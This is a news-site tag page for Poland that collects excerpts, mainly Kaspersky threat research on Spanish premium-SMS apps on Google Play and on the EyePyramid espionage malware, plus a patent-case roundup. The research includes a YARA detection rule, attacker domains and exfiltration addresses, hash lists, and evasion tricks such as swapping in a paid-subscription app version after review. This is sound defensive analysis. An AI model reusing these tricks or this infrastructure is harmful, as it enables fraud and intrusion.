Home Tags Poland

Tag: Poland

How new national cybersecurity center aims to make Poland a tougher...

Juliusz Brzostek, director of Poland's NC Cyber, explains what the country's cybersecurity center has been up to in its first nine months of operation.

UK Loan Firm Wonga Suffers Financial Data Breach

Customers in the UK and Poland may have had their bank account details compromised.

Azimo’s revolutionary ‘request’ feature brings money transfer to 1bn people worldwide

Azimo gives back control to often-forgotten recipients, using just a phone number.London, UK, Tuesday, 4th April, 2017 – Azimo, the international money transfer service, today launches an industry- first feature, revolutionising how money is shared internationally.

Azimo’s new app feature creates a fundamental change in the global remittances market.

Customers across Poland, the US and Canada will now be empowered to make requests for money from anywhere across the UK and Eurozone and receive it... Source: RealWire

Lazarus Under The Hood

Today we'd like to share some of our findings, and add something new to what's currently common knowledge about Lazarus Group activities, and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

New wave of cyberattacks against global banks linked to Lazarus cybercrime...

Dozens of banks -- particularly in the United States and Poland -- have been targeted by newly identified malware.

Expensive free apps

This post is the result of collaboration between Elevenpaths (Telefónica Cyber Security Unit) and Kaspersky Lab.

Both companies have used their own expertise, researchers and tools, such as Tacyt (an innovative tool for the monitoring and analysis of mobile threats) and GReAT’s internal tools and resources.
Big Brother and Google Play Fraudulent apps trying to send Premium SMS messages or trying to call to high rate phone numbers are not something new.

Actually, it is easy to find them specially in Spain, Russia and some other european countries. Of course, it is much more interesting to talk about how certain groups bypass detection mechanisms such as those used by Google Play, since this has become difficult to achieve in the past few years. Some years ago it was pretty easy to upload a dialer (or other similar fraudulent app) to Google Play [1] [2], but new detection mechanisms made attacker to focus on alternative markets, at least for a period of time. Recently, we have found a Spanish group that successfully uploaded a non-official Big Brother (Gran Hermano) TV show app, which is one of the most popular TV shows in Spain even being on the air for 16 years now. [Analysis:cdd254ee6310331a82e96f32901c67c74ae12425] This was not a very sophisticated app, but they were able to upload it into Google Play using an old trick.

First, they uploaded a clean an innocuous version that of course passed or the security controls from Google Play.

Then, some days later, a new version was uploaded with a major features update, including subscription to paying services.

This trick was extremely simple but successful, since the app was in the Google Play for around two months (from mid September to mid November 2015). It seems this was not the first time this group tried to upload a Big Brother-like app. We have detected (via Tacyt [3]) at least another 4 similar applications that, regarding some particular logging messages we found in the code, could have the same origin: com.granhermano.gh16_1; from 2015-09-15 to 2015-09-22;com.granhermano162; from 2015-09-29 to 2015-11-14;com.granhermanodieciseis; from 2015-09-29 to 2015-11-11com.granh.gh16_3; from 2015-10-05 to 2015-10-15;com.hisusdk; from 2015-09-16 to 2015-11-14 (the one analyzed). As we said before, this group was found to be using a specific string “caca” as a logging tag, which is not something usual: The word “caca” is a colloquial word in Spanish referring to an excrement (very similar to the word “poo” in English). We could find it in certain testing code, referring to lines of code that should be removed later, but it is unusual to find it in such similar applications and used in the same way.

Because of that, it makes sense to think that those applications were developed by the same group. Other strings and function names used in the code make us conclude that those applications could be developer by native Spanish speakers. This app is using several commercial third party services such as Parse.com for the first network communication.

This first API call is used in order to get all the information necessary to run further actions (URLs, authentication, etc). {“results”:[{“Funcionamiento”:” Ahora la única pestaña importante es la de VOT.”,”action1″:”http://tempuri.org/getPinCode”,”action2″:”http://tempuri.org/crearSubscripcion”,”activa”:”si”,”createdAt”:”2015-09-08T16:17:24.550Z”,”estado”:true,”id_categoria”:”2608″,”id_subscripcion”:”400″,”metodo1″:”getPinCode”,”metodo2″:”crearSubscripcion”,”namespace”:”http://tempuri.org/”,”nombreApp”:”GH16 – españa”,”numero_corto”:”795059″,”numero_sms”:”+34911067088″,”objectId”:”tNREzkEocZ”,”password”:”15xw7v7u”,”updatedAt”:”2015-11-27T10:28:00.406Z”,”url”:”http://ws.alertas.aplicacionesmonsan.net/WebSubscription.asmx?WSDL”,”urlcode”:”http://spamea.me/getcode.php?code=”,”usuario”:”yourmob”,”vot”:true}]} As we can see above, it references to different URLs: spamea.me is service that no longer exists at the time of writing, but that used to be hosted on 107.6.184.212, which seems a hosting service shared with many other websites. ws.alertas.aplicacionesmonsan.net is legitimate service focused on mobile monetization, including SMS premium and direct carrier billing.
It is used from the app in order to subscribe the user to a service called “yourmob.com”. Of course, using paying services is not malicious itself, since it is legitimate that companies could bill for their services, but user should be clearly noticed about service cost and conditions beforehand. Despite we found a reference to “Terms and Conditions” (in Spanish) poiting to the website servimob.com , we could not verify that this information is shown to users and, anyway, users don’t have the opportunity to reject the agreement and don’t be subscribed. Presence outside Google Play It make sense that if a group have included this kind of app in Google Play, They were going to try something similar using other app sources (thanks to Facundo J.
Sánchez that spotted this). Analysis: 9b47070e65f81d253c2452edc5a0eb9cd17447f4 This app worked slightly different.
It uses other 3rd party services and it sends Premium SMSs for monetization.

They got from the server what number to use, for how many seconds and if the screen should be on or off. We found that they used very similar words for comments and method names (most of them in Spanish, including “caca”), same topic (Big Brother), references to “yourmob” and much more, so definitely we can link it with the Spanish group mentioned before. One of the webservices used by this application (http://104.238.188.38/806/) exposed a control panel showing information about people using this app: As you probably know, groups developing this kind of apps usually reuse their servers and supporting infrastructure for multiple apps, for example this one: https://www.virustotal.com/en-gb/file/cc2895442fce0145731b8e448d57e343d17ca0d4491b7fd452e6b9aaa4c2508a/analysis/ It was using this vps as well http://vps237553.ovh.net.
Some of the panels and services provided by the VPS were located here: http://vps237553.ovh.net/nexmo/getcode.php?code=http://vps237553.ovh.net/polonia/autodirect1.phphttp://vps237553.ovh.net/polonia/autodirect2.phphttp://vps237553.ovh.net/polonia/guardar_instalacion.phphttp://vps237553.ovh.net/polonia/guardar_numero.phphttp://vps237553.ovh.net/polonia/guardar_numero.php?androidID=http://vps237553.ovh.net/polonia/guardar_sms.phphttp://vps237553.ovh.net/polonia/push_recibido.phphttp://vps237553.ovh.net/polonia/panel.phphttp://vps237553.ovh.net/nexmo/ As we can see in their control panel, they have been quite successful in terms of spread, since there are registered phones from many different countries (Spain, Holland, Poland, etc). In addition, an iterative search on terms such as IP addresses, unique paths, etc, has shown that other apps could be using the same supporting infrastructure that was shown above, including the following IP addresses and domain names: In particular, 45.32.236.127 was pointed by different domain names in the past months: kongwholesaler.tk (2016-05-22) acc-facebook.com (2016-04-11) h-instagram.com (2016-04-11) msg-vk.com (2016-04-11) msg-google.ru (2016-04-10) msg-mail.ru (2016-04-10) iwantbitcoins.xyz (2015-11-04) These domains have probably been used for fraudulent initiatives such as phishing attacks, since they are very similar to well-known and legitimate services. Something that kept our attention was that “vps237553.ovh.net”, used from a sample and resolving to 51.255.199.164, was also used at some point (June 2016 regarding our passive DNS) by “servimob.com” domain (same domain referenced in the app from Google Play). Back to Google Play As you can imagine, they tried again to upload a new app to Google Play, following a similar philosophy and techniques that we have seen before. e49faf379b827ee8d3a777e69f3f9bd3e559ba0311a131c23e6427dd7e0e47280dd8f421febdc4f7 These apps were available in Google Play for a few weeks in September 2016, using similar techniques, especially to those applications that we found outside Google Play. Conclusions This Spanish group has been quite successful on uploading this kind of apps in Google Play, using interesting topics such as the Big Brother TV show.
Spain and Poland have been two countries traditionally targeted by SMS scams and similar malware. However, we have never seen in the past few years any group that was able to upload apps to legitimate markets in such an easy way. Perhaps the key point is that they try to be close enough to the border between a legitimate business and a malicious one.

The “EyePyramid” attacks

On January 10, 2017, a court order was declassified by the Italian police, in regards to a chain of cyberattacks directed at top Italian government members and institutions. The attacks leveraged a malware named “EyePyramid” to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy.

These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank. The malware was spread using spear-phishing emails and the level of sophistication is low. However, the malware is flexible enough to grant access to all the resources in the victim’s computer. During the investigation, involved LEAs found more than 100 active victims in the server used to host the malware, as well as indications that during the last few years the attackers had targeted around 16,000 victims.

All identified victims are in Italy, most of them being Law Firms, Consultancy services, Universities and even Vatican Cardinals. Evidence found on the C&C servers suggests that the campaign was active since at least March 2014 and lasted until August 2016. However, it is suspected that the malware was developed and probably used years before, possibly as far back to 2008. Two suspects were arrested on January 10th, 2017 and identified as 45-year-old nuclear engineer Giulio Occhionero and his 47-year-old sister Francesca Maria Occhionero. Investigation Although the Italian Police Report doesn’t include malware hashes, it identified a number of C&C servers and e-mails addresses used by the malware for exfiltration of stolen data. Excerpt from the Italian court order on #EyePyramid(http://www.agi.it/pictures/pdf/agi/agi/2017/01/10/132733992-5cec4d88-49a1-4a00-8a01-dde65baa5a68.pdf) Some of the e-mail addresses used for exfiltration and C&C domains outlined by the police report follow: E-mail Addresses used for exfiltration gpool@hostpenta[.]com hanger@hostpenta[.]com hostpenta@hostpenta[.]com purge626@gmail[.]com tip848@gmail[.]com dude626@gmail[.]com octo424@gmail[.]com tim11235@gmail[.]com plars575@gmail[.]com Command-and-Control Servers eyepyramid[.]com hostpenta[.]com ayexisfitness[.]com enasrl[.]com eurecoove[.]com marashen[.]com millertaylor[.]com occhionero[.]com occhionero[.]info wallserv[.]com westlands[.]com Based on these indicators we’ve quickly written a YARA rule and ran it through our systems, in order to see if it matches any samples. Here’s how our initial “blind”-written YARA rule looked like: rule crime_ZZ_EyePyramid { meta: copyright = ” Kaspersky Lab”author = ” Kaspersky Lab”maltype = “crimeware”filetype = “Win32 EXE”date = “2016-01-11”version = “1.0” strings: $a0=”eyepyramid.com” ascii wide nocase fullword$a1=”hostpenta.com” ascii wide nocase fullword$a2=”ayexisfitness.com” ascii wide nocase fullword$a3=”enasrl.com” ascii wide nocase fullword$a4=”eurecoove.com” ascii wide nocase fullword$a5=”marashen.com” ascii wide nocase fullword$a6=”millertaylor.com” ascii wide nocase fullword$a7=”occhionero.com” ascii wide nocase fullword$a8=”occhionero.info” ascii wide nocase fullword$a9=”wallserv.com” ascii wide nocase fullword$a10=”westlands.com” ascii wide nocase fullword$a11=”217.115.113.181″ ascii wide nocase fullword$a12=”216.176.180.188″ ascii wide nocase fullword$a13=”65.98.88.29″ ascii wide nocase fullword$a14=”199.15.251.75″ ascii wide nocase fullword$a15=”216.176.180.181″ ascii wide nocase fullword$a16=”MN600-849590C695DFD9BF69481597241E-668C” ascii wide nocase fullword$a17=”MN600-841597241E8D9BF6949590C695DF-774D” ascii wide nocase fullword$a18=”MN600-3E3A3C593AD5BAF50F55A4ED60F0-385D” ascii wide nocase fullword$a19=”MN600-AD58AF50F55A60E043E3A3C593ED-874A” ascii wide nocase fullword$a20=”gpool@hostpenta.com” ascii wide nocase fullword$a21=”hanger@hostpenta.com” ascii wide nocase fullword$a22=”hostpenta@hostpenta.com” ascii wide nocase fullword$a23=”ulpi715@gmx.com” ascii wide nocase fullword$b0=”purge626@gmail.com” ascii wide fullword$b1=”tip848@gmail.com” ascii wide fullword$b2=”dude626@gmail.com” ascii wide fullword$b3=”octo424@gmail.com” ascii wide fullword$b4=”antoniaf@poste.it” ascii wide fullword$b5=”mmarcucci@virgilio.it” ascii wide fullword$b6=”i.julia@blu.it” ascii wide fullword$b7=”g.simeoni@inwind.it” ascii wide fullword$b8=”g.latagliata@live.com” ascii wide fullword$b9=”rita.p@blu.it” ascii wide fullword$b10=”b.gaetani@live.com” ascii wide fullword$b11=”gpierpaolo@tin.it” ascii wide fullword$b12=”e.barbara@poste.it” ascii wide fullword$b13=”stoccod@libero.it” ascii wide fullword$b14=”g.capezzone@virgilio.it” ascii wide fullword$b15=”baldarim@blu.it” ascii wide fullword$b16=”elsajuliette@blu.it” ascii wide fullword$b17=”dipriamoj@alice.it” ascii wide fullword$b18=”izabelle.d@blu.it” ascii wide fullword$b19=”lu_1974@hotmail.com” ascii wide fullword$b20=”tim11235@gmail.com” ascii wide fullword$b21=”plars575@gmail.com” ascii wide fullword$b22=”guess515@fastmail.fm” ascii wide fullword condition: ((uint16(0) == 0x5A4D)) and (filesize < 10MB) and((any of ($a*)) or (any of ($b*)) )} To build the YARA rule above we’ve used every bit of existing information, such as custom e-mail addresses used for exfiltration, C&C servers, licenses for the custom mailing library used by the attackers and specific IP addresses used in the attacks. Once the YARA rule was ready, we’ve ran it on our malware collections.

Two of the initial hits were: MD5 778d103face6ad7186596fb0ba2399f2 File size 1396224 bytes Type Win32 PE file Compilation Timestamp Fri Nov 19 12:25:00 2010 MD5 47bea4236184c21e89bd1c1af3e52c86 File size 1307648 bytes Type Win32 PE file Compilation timestamp Fri Sep 17 11:48:59 2010 These two samples allowed us to write a more specific and more effective YARA rule which identified 42 other samples in our summary collections. At the end of this blogpost we include a full list of all related samples identified. Although very thorough, the Police Report does not include any technical details about how the malware was spread other than the use of spear phishing messages with malicious attachments using spoofed email addresses. Nevertheless, once we were able to identify the samples shown above we used our telemetry to find additional ones used by the attackers for spreading the malware in spear-phishing emails.

For example: From: Di Marco GianmariaSubject: ricezione e attivazioneTime:2014/01/29 13:57:42Attachment: contatto.zip//Primarie.accdb (…) .exe From: Michelangelo GiorgianniSubject: R: Re: CONVOCAZIONE]Time: 2014/01/28 17:28:56]Attachment: Note.zip//sistemi.pdf (…) .exe Other attachment filenames observed in attacks include: Nuoveassunzioni.7z Assunzione.7z Segnalazioni.doc (…) 7z.exe Regione.7z Energy.7z Risparmio.7z Pagati.7z Final Eight 2012 Suggerimenti Uso Auricolari.exe Fwd Re olio di colza aggiornamento prezzo.exe Approfondimento.7z Allegato.zip Eventi.bmp (…) .exe Quotidiano.mdb (…) _7z.exe Notifica operazioni in sospeso.exe As can be seen the spreading relied on spearphishing e-mails with attachments, which relied on social engineering to get the victim to open and execute the attachment.

The attachments were ZIP and 7zip archives, which contained the EyePyramid malware. Also the attackers relied on executable files masking the extension of the file with multiple spaces.

This technique is significant in terms of the low sophistication level of this attack. High profile victims Potential high-profile Italian victims (found as recipients of spear-phishing emails according to the police report) include very relevant Italian politicians such as Matteo Renzi or Mario Draghi. It should be noted however there is no proof than any of them got successfully infected by EyePyramid – only that they were targeted. Of the more than 100 active victims found in the server, there’s a heavy interest in Italian law firms and lawyers.

Further standout victims, organizations, and verticals include: Professional firms, Consultants Universities Vaticano Construction firms Healthcare Based on the KSN data for the EyePyramid malware, we observed 92 cases in which the malware was blocked, of which the vast majority (80%) of them were in Italy. Other countries where EyePyramid has been detected includes France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland. Assuming their compilation timestamp are legit – and they do appear correct, most of the samples used in the attacks have been compiled in 2014 and 2015. Conclusions Although the “EyePyramid” malware used by the two suspects is neither sophisticated nor very hard to detect, their operation successfully compromised a large number of victims, including high-profile individuals, resulting in the theft of tens of gigabytes of data. In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence. This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims. As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations. Perhaps the most surprising element of this story is that Giulio Occhionero and Francesca Maria Occhionero ran this cyber espionage operation for many years before getting caught. Kaspersky Lab products successfully detect and remove EyePyramid samples with these verdicts: HEUR:Trojan.Win32.Generic Trojan.Win32.AntiAV.choz Trojan.Win32.AntiAV.ciok Trojan.Win32.AntiAV.cisb Trojan.Win32.AntiAV.ciyk not-a-virus:HEUR:PSWTool.Win32.Generic not-a-virus:PSWTool.Win32.NetPass.aku A full report #EyePyramid, including technical details of the malware, is available to customers of Kaspersky APT Intelligence Services.

Contact: intelreports (at) kaspersky [dot] com
. To learn how to write YARA rules like a GReAT Ninja, consider taking a master class at Security Analyst Summit. – https://sas.kaspersky.com/#trainings References and Third-Party Articles Indicators of Compromise Hashes: 09ff13b020de3629b0547e0312a6c135102bccd95e5d8a56c4f7e8b902f5fb7112f3635ab1de63fbcb5e1c492424c6051391d37c6b809f48be7f09aa0dab76571498b8d6e946b5d6b529abea1359238114db577a9b0bfc62f3a25a9a51765bc517af7e00936dcc8af376ad899501ad8b192d5866cbfafae36d5ba321c817bc14325f5d379c4d091743ca8581f15d329536bd8feed1b17c59f3c653e6427661a4380b0f1921fed82e1b68b4e442b04f053c30f0114c600510fdb2573cc48d5c063fed695e2a6e63d971c16fd9e825fec547bea4236184c21e89bd1c1af3e52c8647dd1e017aae694abd2b7bc0b12cf1da47f1f9b1339147fe2d13772b4cb8103053b41dc0b8fd9663047f71bc91a317df5bc1b8c07c0f83d438a3e891dc3899545eb17f400f38c1b65990a8d60c298d956de1e478301d59ac14b8e9636b53815d75621de46a12234af0bec15620be6763778d103face6ad7186596fb0ba2399f2859f60cd5d0f0fbd91bde3c3914cbb188afb6488655cbea2737d2423843ea0779173aefe64b7704510c873e2ce7305e092c32eb72f5713ca1f2a8dc918f1f770932bd2ad79cbca4341d853a4b5ea1da594eff87eca2f054aa5fbc1877a6cf91998825a1ce35f46d004c0839e87cc27789b8571b5281f3751750d3099049098e09c57839b3f8462bd6c2d36db80cd5ecc9d3ce3246975ae6d545ee9e8ba12d1649d4b46d3c389e0144238c821670f8537a41c5374a14a2c7cbe093ff6b075e8acb39a673a5d2ceaa1fb5571769097ca77b533b082ed1458c482c3663ee12dc3a4bcfd544df7d8e9a2efe9d2ed32e74cadc0243741bfece772f02d1657dc057229c38e9edc0e4b18ff1fc5b61b771f7946ce76b690dc98844c721e6337cd5e7f4bcf391937d79ed6650893b1d5fbed0604d8432ddec880800bfa060af1f8c2e405eb604e7e27727a410fc226196c13afe9fafd293065daf126a9ad9562fc0b00b2 Related hashes identified by @GaborSzappanos: 014f69777d2e0c87f2954ad252d5281002965c8a593989ff7051ec24736da6bd04b3c63907c20d9be255e167de89a39804e949f64e962e757f5bb8566c07800b06e47736256c54d9dd3c3c533c73923e09ff13b020de3629b0547e0312a6c1350a80fd5abf270ddd8080f935058546840b3c1ff3b3b445f46594227ca2babdcd0c33c00a5f0f5bde8c426c3ce376eb110ded0389cbddeeb673836794269ffb3b0e19913ce9799a05ba97ac172ec5f0bc11062b36893c4ba278708ec3da07b1dd12b4d543ae1b98df15c8712d888c54f01334a7df1e59380206841d05d840077814cb305de2476365ef02d2226532dd341748c33cb5ac6f26d55cd1a58b68df8a18e24ef2791030693a4588bfcae1dec0192d5866cbfafae36d5ba321c817bc141b4d423350cd1159057dd7dbef4793281deb28ae7b64fb44358e69e5afd1f6002222a947ebccc8da16badeacca05df4b23beed8aaac883a5902039e6fd84ee5f2485e7ae3e0705898b7787ed0961878d2642990a46c434e7787a599f04742a32268698314c854bc483d05ffe459dc5402866ced99b46b39838f56fbe704d387b2896ae0489451d32f57c68b919b3fa7228ba7d1a4c5d64a65f2f2bf5f6ced12328e65b9577abaabf3f8c94d9fda50fc52a809644e6d07dc9fc111804a62b808930215197622f5c747fc869992768d9c6325f5d379c4d091743ca8581f15d329533890f9268023cd70c762ad2054078c73673c155eb6a0bd8a94bea265ebb8b76369cd42dfabea188fa57f802a83b55d9380b0f1921fed82e1b68b4e442b04f053a0af8bba61734b043edc0f6c61cd1893c30f0114c600510fdb2573cc48d5c063db711afc09c0a403a8ccff6a8a958df3e4365b079239b0a2451f48f337613323ebbae038d7bf19baa1bcfbc438bb5e73fed695e2a6e63d971c16fd9e825fec53ffcd0eedd79a9cc79c2c4a0f7e04b214025834a88dcfba3ed1774068c64c546417593eaf61d45e88adbad259d5585d0422fe9c78c71fb30d376e28ad1c4188444d91f49f261da6b1f183ea131d12a7f45dde4082c0407b9904c5f284080337f47bea4236184c21e89bd1c1af3e52c864a494c20bcfb77afd06908eb5a9718cb53b41dc0b8fd9663047f71bc91a317df5523aa1d4ee5f19522299be6f1111b895627cb8752c4c0774f822ccf8f1363eb56499e0b590857f73bb54f500008c656568895c8340a88316fdc0d77a7f2a91d5847072fd4db9e83d02d8b40a1d678505accd89d6483dec54acc7b1484dfbace5b5f3f65b372f9e24dbc50b21fe31f815bc1b8c07c0f83d438a3e891dc389954622fb530276a639892398410de03d05163d9e7cca593360411b5d05a555d52f36648a255610c5f60f580098bbc1d387c690cdf20faf470f828fe468a635da34e6c25a0974a907d368372ac460d8261d66c5693df933924e8a633ccfd7ef2635d6ff7876db06d9102786ae0e425aeaf3770882709d86e2a7396779f4111cd02e370f094e347d4088573c9af34430a3cd672ffb3418d3cde6fdef16b5b5db01127734cfa84d68506fe6e74eb1b038d9c707633748203b705109ededadfbe08dcfa778d103face6ad7186596fb0ba2399f277c2a369d0850c7a75487e8eee54b69e78b7d1caa4185f02b1c5ef493bf795297971c90d7533f2c69e33f2461434096a7aad90ce44e355f95b820fb59c9f5d567bf348005958658ba3fcf5ccb3e2ae227cddc3b26bb8f98e9b14d9c988f36f8f81624dc108e2d3dc712f3e6dd138736a820ca39f331f068cca71e7a7c281e4ac84c14a1327ae7c0e5a07a67a57451cc4860f607dbd0d6a2dc69cbc4f3b0eeeaf889c86aaf22876516964eafa475a2acd88c31f3b589d64a275608f471163989c89368652dc98b13f644ec2e356c7707c89696dbead484bf948c1dd86364672eb898150dea4d7275f996e7341463db21f8b27bcfa38205754c8e5fdf6a509d60e8f419bca20b767b03f128a19b82611ab915cc3c9c8cb8e200dbe04e425e7018b92c32eb72f5713ca1f2a8dc918f1f770932bd2ad79cbca4341d853a4b5ea1da598825a1ce35f46d004c0839e87cc277898b1157b9f3f3ec183bf322615f1ce419b19729531bf15afc38dd73bcc0596f89c99ecf33301e4cafdd848a7d3d77ef99cf08b15724e0eaf69a63e47690cdee2a16d8cf9a7a52e5c2ad6519766ae6b92a35312a5c0b06ee89ddadaea9ca6bad2a4c551ec6d3b5ab08a252231439e099fa615a4f5e93a63682a8f25b331f62882a6c29f9680fe5ae10a9250e5431754d4ab71ca072d4b526e258c21bd84ec0632ac6fa4005e587ac4b3456a14bd741ff0afab0fcbf8bc6595f9f2c0051b975a4eb1ddec2f71727dcf747e1d385272e24db2a756f557d273d81a61edc9fbfc9dafb2e1663647addc92bf253f389ac98027b39a673a5d2ceaa1fb5571769097ca77b533b082ed1458c482c3663ee12dc3a4b6e86ac7d3bbedf18b98437df49c1b60b70ddb9f6e4e2c85e80cf2079b10e762b89a8d3442d96161cef07552116407c3bb2a0aee38980aeb39cac06677936c96bc333001d3f458ff8fde9d989b53e16dbd7a2b795419c0b842fd041eaac36d7fbf850dcb074e0cf2e30fbee6bfaa4cd9c0d4e5ba26ef3c08dc1a29ac7496f015c38832f484645b516b57f6813c42d554c4abb3210f26d4a15a0d4fd41b47ee0ec547a30fa39f22e2093b51ed254bb1c2c69c370fcb7b645aaac086b2a3b18286c7ef4c7b12b5ad8198dafc58c4bea2a3c97ef1f13bf3d74c78f50fa7abe7766bca010bcdfe3c4965df0c6bc12b40db76ca243796e79c87c55f67a61bc3ee8ddcca9a7c6b231fadfae3466da890b434c5cf391937d79ed6650893b1d5fbed0604cf3b3c796114f6908a35542d4fd02b0ed034810ddab55c17dcddd2c2990b3ef3d1273537add3f2282391726489c65e38d20487e2d2f674bfd849cb8730225dded8432ddec880800bfa060af1f8c2e405d864ad5030d354c1e40a873a335b2611dac10dcede69eb9b4ccce8e6798f332cdb95221ebed1793bf5b5527ecb52eb0cdc64307ef67177449b31c6bb829edbf2dd734c07b94c8685bb809f83876c7193e0e862dbf001eb4a169d3340c200b501e727b444a6a9fa9d40a34a9508b1079fe7539ed9616b61c12028a663c298f6bee78ed9fac4f3e9b443abd02bfa9f3db2e85ff9e3a27899b0d1de8b958af5ad90eb604e7e27727a410fc226196c13afe9eba8aa2572cf0d6ccdf99c34cc26b6f3ec21252421f26072e9fe75586eb6b58aee9435593494f17f3efc3a795c45482eeeca6409dcf0e46d0182d53d230c701deff2d3f9f56e9aabcf970c4c09fe7ef8f0b61a531a72f0cc02d06d2ebfb935abf1a037e2edc5ddf4db4e1e7fcd33d5fbf3802442727c0b614482455d6ad9edc2f41be516fa8da87a269845c9ea688749f7d4742d2e746962440bf517b261f126f96335bf0512c6e65ea374a844ab7cebf9b4459f18ca9d2974cf5a58495c5879fa4266c305aa75a133ebae2a4dcc9b75fafd293065daf126a9ad9562fc0b00b2 Backdoor Filenames: pnbwz.exepxcfx.exeqislg.exerqklt.exerunwt.exeruzvs.exervhct.exevidhdw.exewinlng.exewxrun.exexddrv.exexdwdrv.exe Malicious attachments filenames (weak indicators): contatto.zip//Primarie.accdb (…) .exeNote.zip//sistemi.pdf (…) .exeNuoveassunzioni.7zAssunzione.7zSegnalazioni.doc (…) 7z.exeRegione.7zEnergy.7zRisparmio.7zPagati.7zFinal Eight 2012 Suggerimenti Uso Auricolari.exeFwd Re olio di colza aggiornamento prezzo.exeApprofondimento.7zAllegato.zipEventi.bmp (…) .exeQuotidiano.mdb (…) _7z.exe

Cybersecurity Expert Links Taiwan And Europe ATM Hacks

Group-IB says both attacks were likely carried out by Cobalt group using malware "ATM spitter." Cybersecurity firm Group-IB has linked the July Taiwan ATM cyber heist to the ATM hacking spree in Europe last year, claiming the two were carried out by the same hacking group, dubbed Cobalt. Reuters reports that Group-IB’s conclusion is based on the fact that the hack technique used in both incidents match. A group of 22 foreign nationals are alleged to be behind the First Commercial Bank ATM hack in Taiwan, of which three Eastern Europeans are in custody. Most of the stolen money was recovered and Taiwan authorities believe the bank network was breached at a London branch. According to a Group-IB report, the hackers used malware “ATM spitter” in the Taiwan attack as well as in similar hacks carried out in Britain, Russia, Poland, Spain, Bulgaria, and many other European countries, Reuters adds. Click here for the full story. Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.
View Full Bio More Insights

The most dramatic patent and copyright cases of 2016

reader comments 6 Share this story Many of the biggest legal disputes in technology relate to "intellectual property," a broad term used for laws relating to everything from copyrights to patents, trademarks to trade secrets.

This year saw significant changes in the copyright and patent landscapes. "Patent trolls" who sue technologists for fun and profit got smacked down by courts more often—and harder—than ever before.

At the same time, universities were filing patent lawsuits at an increased rate, and often winning.In the copyright realm, the Oracle v.

Google
trial dominated the spring.

A jury was left to decide the murky rules about when using an API could be "fair use." That legal uncertainty led to the two tech giants clashing over the ethics of each others' business practices and the history of the smartphone industry. In two very different cases in 2016, copyright issues led to criminal charges being filed. US authorities are seeking to extradite and put on trial a man named Artem Vaulin, who they say made $16 million annually by running a massive online storehouse of pirated films and songs.

And more than three years after they were condemned by a federal judge, lawyers behind a vast array of copyright lawsuits, a firm known as Prenda Law, were arrested and accused of fraud. Here's a look back at 2016's most dramatic IP cases. Graphiq CEO Kevin O'Connor and former director of operations Danny Seigle.

Graphiq (formerly FindTheBest) became the first company to win attorneys' fees in a patent case under the Supreme Court's new Octane Fitness standard.

An appeals court approved the fee award in January 2016. Patent trolls continued to face stiff fines throughout 2016. eDekka, the most litigious patent company just a year ago, collapsed and dropped its appeal after being hit with fees in East Texas. Carnegie Mellon University ended a prolonged patent battle with Marvell Technology in February, with Marvell agreeing to pay a $750 million settlement—the largest payout ever for a patent related to computer science. Pictured here is CMU Professor José Moura, inventor on the two patents in the case. An image explaining one of two patents owned by Carnegie Mellon University, which describe a method of reducing noise when reading data from hard disks.

The patents were used by CMU to sue Marvell Technology. Universities have increasingly been willing to become plaintiffs in high-stakes patent lawsuits, and are sometimes partnering with professional patent enforcement companies to do so.

The Electronic Frontier Foundation launched a "reclaim invention" campaign in June 2016, seeking to pressure universities not to partner with such "patent trolls." Since the US Supreme Court's 2014 Alice v.

CLS Bank
decision, it's been easier to get software patents thrown out of court. Until this year, the US Court of Appeals for the Federal Circuit had only upheld software patents in one post-Alice case.

But in 2016, the Federal Circuit gave approval to software patents in three more cases.

The image above is pulled from the McRo v.

Bandai Namco Games
opinion.

A Federal Circuit panel said McRo's digital animation patents could survive, rejecting arguments from public interest groups like EFF that McRo was being allowed to essentially patent mathematics. In May, a second jury trial between Oracle and Google over whether the Android operating system violated Java copyrights ended with a second resounding win for Google.

The testimony of Jonathan Schwartz, former president of Sun MicroSystems, loomed large in the case.
Schwartz testified that he had no problem with Android, since Google had followed the rules around Java intellectual property that Sun had established. Noah Berger/Bloomberg via Getty Images Oracle attorneys tried to sway the jury by painting former Sun Microsystems president Jonathan Schwartz as a hypocrite, who praised Google in public but privately decried its licensing practices.
It didn't work.

Above is a slide from Oracle's closing argument. In June, a Los Angeles federal jury considered whether or not Led Zeppelin's "Stairway to Heaven" was ripped off from a song by psychedelic rock band Spirit.

The jury found in Led Zeppelin's favor, quelling some fears that the music industry may continue to be plagued with copyright lawsuits over similar-sounding songs.

The case followed a high-profile 2015 trial in which a jury found that the hit song "Blurred Lines" infringed the copyright of Marvin Gaye's "Got to Give it Up." In July, US prosecutors charged Artem Vaulin, a 30-year-old Ukrainian man, with criminal copyright infringement for running the popular website KickAssTorrents.
Vaulin was arrested and is being held in Poland awaiting extradition.
It's the highest profile criminal copyright case since the US charged Kim Dotcom—who's still living in New Zealand, where he's desperately hoping to avoid extradition.

Above is a screenshot of the now-shuttered torrent website. On July 21, the Electronic Frontier Foundation filed a lawsuit that's been a long time coming.

EFF claims that the DMCA's ban on circumventing digital locks violates the First Amendment.

Digital locks may need to be sidestepped "in order to create a running critical commentary on... a political debate, sporting event, or movie," all legitimate activities that should be protected by fair use, EFF argues.

The government has asked for the case to be dismissed, and the matter is awaiting a judge's decision. Pictured above is EFF client Andrew "bunnie" Huang, who wants to market a product for editing HD television signals, but is hampered by copyright limitations he believes are unconstitutional. Record label EMI sued MP3tunes, an early music locker service, in 2007, along with its founder Michael Robertson, pictured above in a 2006 photo.

The litigation caused MP3tunes to go bankrupt in 2012, but Robertson kept fighting his battle in court.
In October 2016, the 2nd Circuit appeals court upheld and even expanded EMI's court win—a disastrous result for Robertson and MP3tunes.

Today, cloud music services are thriving.

